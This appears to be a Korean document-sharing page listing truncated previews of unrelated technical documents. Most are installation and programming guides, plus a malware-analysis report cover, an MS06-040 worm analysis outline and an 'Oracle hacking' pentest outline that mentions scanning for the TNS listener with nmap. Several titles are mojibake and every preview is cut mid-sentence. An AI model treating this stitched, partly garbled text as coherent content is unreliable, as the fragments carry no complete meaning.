ㅇ악성코드 분석 기술문서 2016-10-25 프로젝트 최종보고서 작성자 : 프로젝트 KITRI 제 13 기모의해킹과정 김남용 2 개정이력 개정번호개정내용요약개정일자 1.0 최초제정승인 2016-10-25 1.1 단어수정 2016-10-25 문서규칙 quiz 프로젝트최종보고서 첨부파일버젂문서최종수정일 1 2 3 4 작성및확인은 Microsoft Word 2007으로작성되어졌으며,

More information

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 학습내용 1. Java Development Kit(JDK) 2. Java API 3. 자바프로그래밍개발도구 (Eclipse) 4. 자바프로그래밍기초 2 자바를사용하려면무엇이필요한가? 자바프로그래밍개발도구 JDK (Java Development Kit) 다운로드위치 : http://www.oracle.com/technetwork/java/javas

More information

2006_8_14 (8_17 updated) ms06-040 ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

2006_8_14 (8_17 updated) ms06-040 ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp MS06-040 웜(wgareg.exe) 분석 1. 개요 2. 전파 방법 (그림) browser를 오픈 요청 (그림) srvsvc 에 대한 요청 (그림) Exploit 과정 (그림) 웜 전송 3. 감염 시 악성 기능 (그림) 감염 시 개인방화벽 OFF 예 4. 타 시스템 감염을 위한 공격력 5. 위험 요소 6. 사전 예방 방법 7. 감염 시 치료 방법

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Ubuntu 13.04 설치매뉴얼 작성일자 : 2013.05 cafe24 IDC 사업팀 설치이미지부팅 1. Ubuntu CD(DVD) 를넣고해당미디어로부팅을시킵니다. 2. 처음설치화면에서한국어를선택합니다. Ubuntu 설치 1. 우분투서버설치를선택합니다. 번역안내 1. 한국어설정에대한안내화면이출력됩니다. 아직은번역이완벽하지않다는내용임으로 무시하고 < 예 >

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

/chroot/lib/ /chroot/etc/

/chroot/lib/ /chroot/etc/ 구축 환경 VirtualBox - Fedora 15 (kernel : 2.6.40.4-5.fc15.i686.PAE) 작동 원리 chroot유저 ssh 접속 -> 접속유저의 홈디렉토리 밑.ssh의 rc 파일 실행 -> daemonstart실행 -> daemon 작동 -> 접속 유저만의 Jail 디렉토리 생성 -> 접속 유저의.bashrc 의 chroot 명령어

More information

Webtob( 멀티도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

Webtob( 멀티도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201 Webtob( 멀티도메인 ) SSL 인증서갱신설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 02-512-9375 멀티및와일드인증서의경우포트번호를동일하게설정이가능하다. (https 통신으로 443 으로통일가능 ) 1. 발급받으신인증서를해당 SSL 폴더에업로드또는저장합니다. [root@localhost New]$ cp star.ucert.co.kr* /webtob/ssl

More information

<4D F736F F F696E74202D206D61696E D F6E D20C7D8C5B720BDC3BDBAC5DB20C0FCC1A620C1B6B0C7202D20B3D7C6AEBFF6C5A920C0CEC5CDC6E4C0CCBDBA20C4ABB5E520BCB3C1A4>

<4D F736F F F696E74202D206D61696E D F6E D20C7D8C5B720BDC3BDBAC5DB20C0FCC1A620C1B6B0C7202D20B3D7C6AEBFF6C5A920C0CEC5CDC6E4C0CCBDBA20C4ABB5E520BCB3C1A4> 해킹시스템생성전제조건 (4)- Linux/Unix 네트워크설정및적용 학습목표 Linux/Unix 네트워크인터페이스설정에필요한사항 Linux/Unix 네트워크인터페이스설정에필요한사항 more Linux/Unix 네트워크인터페이스설정에필요한사항 개념 해킹시스템을만들기위한 4 번째단계는네트워크인터페이스카드에대한 TCP/IP 아키텍쳐기반의네트워크설정을함으로타시스템과의통신을가능케함.

More information

Apache install guide

Apache install guide APACHE INSTALL GUIDE 2.X.X VERSION INAMES CO. LTD. 목차 1. 사전준비 mod_ssl OpenSSL 인증서파일 4. 확인및테스트 서비스구동확인 네트워크상태확인 방화벽확인 실제브라우저테스트 2. 주의사항 신규및갱신구분 CSR 직접생성여부 5. 이슈 *:80 443 포트 VirtualHost 대상 Error_log 3. 인증서설치

More information

슬라이드 1

슬라이드 1 UGENS SNC Techinical Report OEL6 + 12C RAC 사원최재정 UGENS SNC 목차 1. 12c 설치된곳에자료수집 2. SERVER DB 삭제 3. 12c grid 설치 4. oracle 12c 설치 5. 확인 2 Vi.bash_profile if [ -f ~/.bashrc ]; then. ~/.bashrc fi # User specific

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Install Linux Jo, Heeseung Download Programs Download VMWare player http://www.vmware.com/products/player/playerproevaluation.html Download Ubuntu iso file http://cslab.jbnu.ac.kr/_down/ubuntu-16.04.2-desktopamd64.iso

More information

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인 스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게

More information

초보자를 위한 ASP.NET 2.0

초보자를 위한 ASP.NET 2.0 (World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 WEB SERVER PORTING 1 Jo, Heeseung 웹서버포팅 HBE-SM5-S4210 를임베디드웹서버로사용할수있도록웹서버를올리는작업 임베디드서버에널리쓰이는웹서버들중 GoAhead 라는웹서버를포팅 CGI 프로그램을이용하여웹에서 HBE-SM5-S4210 의 LED, 7- Segment, TextLCD 를제어실습 2 Goahead webserver 소스를다운받거나제공된

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

소프트웨어설치 1. 소프트웨어설치및제거 ( 소스코드 ) 소스코드컴파일을이용한 S/W 설치 1. 소스코드다운로드 - 예 ) httpd tar.gz - 압축해제 : #tar xzvf httpd tar.gz - INSTALL 또는 README파일참조

소프트웨어설치 1. 소프트웨어설치및제거 ( 소스코드 ) 소스코드컴파일을이용한 S/W 설치 1. 소스코드다운로드 - 예 ) httpd tar.gz - 압축해제 : #tar xzvf httpd tar.gz - INSTALL 또는 README파일참조 운영체제실습 소프트웨어관리 2016. 6 표월성 passwd74@naver.com cherub.sungkyul.ac.kr 목차 Ⅶ. 소프트웨어관리 1. 소스코드컴파일을이용한소프트웨어설치 2. RPM패키지를이용한소프트웨어설치 3. YUM패키지를이용한소프트웨어설치 4. APT패키지를이용한소프트웨어설치 5. Telnet서버설치 6. ssh서버 (openssh) 설치

More information

vRealize Automation용 VMware Remote Console - VMware

vRealize Automation용 VMware Remote Console - VMware vrealize Automation 용 VMware Remote Console VMware Remote Console 9.0 이문서는새버전으로교체되기전까지나열된각제품버전및모든이후버전을지원합니다. 이문서에대한최신버전을확인하려면 http://www.vmware.com/kr/support/pubs 를참조하십시오. KO-002230-00 vrealize Automation

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 임베디드리눅스개발환경실습 Jo, Heeseung 타겟보드모니터링동작실습 호스트 PC 에서시리얼포트를통해서타겟보드를모니터링 타겟보드가프로그램을실행하는동안일어나는일을시리얼포트로메시지를출력하면호스트 PC 에서는시리얼포트를통해메시지를수신하여이를화면에출력 minicom 프로그램사용 - minicom 이정상적으로설정이되고, 타겟보드에최소한부트로더가올라간상태라면 minicom

More information

RedHat Linux Fedora Core 4 + APM 소스컴파일설치 김희균 [ 사전준비 : 리눅스시디, 리눅스설치공간준비와컴퓨터의 IP 주소와넷마스크, 게이트웨이주소기록 1. Linux 시디로부팅을한다. 2. Gra

RedHat Linux Fedora Core 4 + APM 소스컴파일설치 김희균 [  사전준비 : 리눅스시디, 리눅스설치공간준비와컴퓨터의 IP 주소와넷마스크, 게이트웨이주소기록 1. Linux 시디로부팅을한다. 2. Gra RedHat Linux Fedora Core 4 + APM 소스컴파일설치 김희균 [http://huikyun.tistory.com] 사전준비 : 리눅스시디, 리눅스설치공간준비와컴퓨터의 IP 주소와넷마스크, 게이트웨이주소기록 1. Linux 시디로부팅을한다. 2. Graphic mode 와 Text mode 중 Graphic mode 사용을위해

More information

<31332DB9E9C6AEB7A2C7D8C5B72D3131C0E528BACEB7CF292E687770>

<31332DB9E9C6AEB7A2C7D8C5B72D3131C0E528BACEB7CF292E687770> 보자. 이제 v4.6.2-1 로업데이트됐다. 그림 F-15의하단처럼 msfupdate를입력해 root @bt:~# msfudpate 그림 F-16 과같이정상적으로업데이트가진행되는것을볼수있다. 이후에는 msfupdate를입력하면최신업데이트모듈과공격코드를쉽게유지할수있다. 그림 F-16 msfupdate의진행확인 G. SET 업데이트문제해결 백트랙을기본설치로운영을할때에는

More information

Microsoft PowerPoint 통신 및 압축 명령어.ppt

Microsoft PowerPoint 통신 및 압축 명령어.ppt 컴퓨터특강 () 2006 년봄학기 문양세강원대학교컴퓨터과학과 PING 원격지컴퓨터의상태 (accessible 여부 ) 를확인 $ ping host-name // alive or dead check $ ping s host-name // packet 송수신확인 Page 2 1 TELNET (1/4) telnet 은원격지에있는상대방컴퓨터에자신의컴퓨터를접속하여,

More information

Discrete Mathematics

Discrete Mathematics 컴퓨터특강 () 2005 년봄학기 문양세컴퓨터과학과강원대학교자연과학대학 PING 원격지컴퓨터의상태 (accessible 여부 ) 를확인 $ ping host-name // alive or dead check $ ping s host-name // packet 송수신확인 Page 2 TELNET (1/4) telnet 은원격지에있는상대방컴퓨터에자신의컴퓨터를접속하여,

More information

chap2

chap2 Lecture 02: 리눅스사용 상지대학교컴퓨터공학과고광만 kkman@sangji.ac.kr http://compiler.sangji.ac.kr 2018 2.1 기본명령어 간단한명령어사용 $ date $ hostname $ uname $ who $ ls $ clear $ passwd 3 2.2 파일및디렉터리 파일의종류 l 일반파일 (ordinary file)

More information